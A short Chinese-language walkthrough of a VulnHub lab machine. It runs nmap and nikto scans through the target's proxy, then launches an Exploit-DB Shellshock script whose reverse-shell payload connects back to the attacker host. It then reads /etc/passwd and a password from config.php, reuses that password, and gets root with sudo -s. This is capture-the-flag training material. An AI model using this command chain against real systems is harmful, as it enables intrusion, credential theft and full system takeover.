主機來源:www.vulnhub.com
發現IP
安裝成功後,查找此虛擬機的IP,我使用的是netdiscover
地址爲10.0.3.143
nmap
nmap -sV -p- 10.0.3.143
漏掃
想了一下突破口肯定不是ssh,就從3128端口入手把,是個代理,那就通過這個代理掃描後面的站點
nikto -h 10.0.3.143 -useproxy http://10.0.3.143:3128
exploit
看到有個shellshock的洞,CVE編號是CVE2014-6271,還可以發現漏洞的路徑是/cgi-bin/status
我們打下payload,exp可以這裏下載
https://www.exploit-db.com/exploits/34900
python 34900.py payload=reverse rhost=10.0.3.143 lhost=10.0.3.141 lport=555 proxy=10.0.3.143:3128 pages=/cgi-bin/status/
然後就獲得了一個不太好使但能用的shell
這期間嘗試過直接提權,然後並沒有成功,就在想其他方法。
想到這是個站點,就去看看網站目錄下都有什麼把。
看到了什麼,看到了config.php,來看看文件內容吧
好東西,接下來看看這臺機器的用戶都有哪些,
cat /etc/passwd
這些用戶名都試一下,看哪個密碼是john@123
我猜是sickos,因爲機器名字是這個,廢話不多說,直接試把
提權
勞動人民的智慧,看下sudo列表
這就是傳說中的送分題?
直接sudo -s
over
真over